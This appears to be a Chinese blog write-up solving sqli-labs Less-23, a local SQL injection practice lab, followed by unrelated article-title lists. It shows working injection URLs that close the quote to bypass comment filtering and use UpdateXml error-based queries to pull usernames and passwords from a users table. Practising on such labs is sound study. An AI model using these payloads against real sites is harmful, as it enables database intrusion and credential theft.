加单引号报错

加#

http://localhost/sqli-labs-master/Less-23/?id=1'%23

错误没有改变,推测过滤了#

查看源码发现# -- 都被替换掉了

那么可用通过闭合单引号的方式

http://localhost/sqli-labs-master/Less-23/?id=1' and '1'='1

然后通过UpdateXml函数利用报错取数据

http://localhost/sqli-labs-master/Less-23/?id=1' and UpdateXml(1,concat(0x7e,(select username from users limit 1,1),0x7e),1)='1

http://localhost/sqli-labs-master/Less-23/?id=1' and UpdateXml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1)='1

最新文章

  1. (转载)基于LBS地图的开发,满足地图上有头像的需求
  2. vs快捷键
  3. Xn数列(codevs 1281)
  4. unbuntu server (linux系统)下面安装 lamp
  5. Echarts通过Ajax实现动态数据加载
  6. ZOJ 3329 【概率DP】
  7. 基于Js实现的UrlEncode和UrlDecode函数代码
  8. spring Bean的三种注入方式
  9. tinyxml2库的使用--MFC工程
  10. 我用Cocos2d-x模拟《Love Live!学院偶像祭》的Live场景(三)
  11. C++编程求数组中重复的数字
  12. ASP.NET Core 实战:使用 ASP.NET Core Web API 和 Vue.js 搭建前后端分离项目
  13. [insight] debug
  14. python 读取默认配置文件和用户配置文件 configs
  15. Hadoop学习笔记1 - 使用Java API访问远程hdfs集群
  16. TP内部方法访问
  17. Winform开发框架之简易工作流设计(转自 伍华聪博客)
  18. Next generation sequencing (NGS)二代测序数据预处理与分析
  19. Linux使用笔记
  20. 【DB2】慎用nickname,可能会引起效率较低

热门文章

  1. 【[Offer收割]编程练习赛14 C】可疑的记录
  2. 【codeforces 796A】Buying A House
  3. nyoj 309
  4. code vs 3376 符号三角形
  5. Effective C++ 45-48
  6. edittext禁止android软键盘弹出
  7. ExtJs--06--Ext.WindowGroup相关方法简单使用
  8. xpath元素查找提示is not clickable
  9. stl之hash_multimap
  10. luogu3157 动态逆序对